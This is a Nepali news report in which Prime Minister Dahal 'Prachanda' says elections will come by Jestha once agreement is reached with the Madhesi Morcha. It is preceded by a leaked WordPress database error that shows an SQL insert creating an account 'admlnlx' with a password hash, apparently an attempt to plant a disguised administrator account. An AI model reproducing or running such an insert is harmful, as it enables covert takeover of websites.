WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Br00/O/ykyNcN/e7XWQJn4gj7MHbg1.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 08:34:06', '', 'admlnlx', 'admlnlx')
चितवन,माघ २६-
प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ले वैशाख,जेठ भित्रै निर्वाचन हुने दावी गर्नुभएको छ ।प्रेस सेन्टर चितवनले आज भरतपुरमा आयोजना गरेको पत्रकार सम्मेलनमा वोल्दै प्रधानमन्त्री दाहालले क्याविनेटले निर्णय गरेर निर्वाचन आयोगलाई जेठ भित्रै निर्वाचन सम्पन्न गरिसक्ने गरी तयारी गर्नु भनिसकेपछी मिति तोक्नु वरावर भएको वताउनु भयो ।
मधेसी मार्चालाई पनि सामेल गराएर निर्वाचन गराउनुपर्ने भएकाले मिति नतोकिएको उहांको भनाई छ । मधेसी मोर्चासंग वार्ता चलिरहेको छ “उहांले भन्नुभयो– मोर्चा संगको सहमतीपछि कुनैपनि वेला मिति तोकिन्छ ।”स्थानिय निकाय पुनसंरचना आयोगलाई विवाद मिलाउन १५ दिनको समय दिइएकोले पनि यसका लागी केहिदिन पर्खिएको प्रधानमन्त्रीको भनाई थियो ।

मोर्चा संगको सहमतीका लागी संविधान संसोधन विधेयक पारित गराउन कोशीस गर्ने नभए सहमती गरेर निर्वाचनमा जाने प्रधानमन्त्री दाहालले वताउनु भयो ।एमालेलाई अनेक खालका कुरा गर्नुभन्दा निर्वाचनका लागी सरकारलाई सहयोग गर्न दाहालले आग्रह गर्नुभयो ।अर्को एक प्रसंगमा प्रधानमन्त्रीले राप्रपाले सरकार नछाड्ने वरु सरकार अझ वलियो वन्ने दावी गर्नुभयो ।

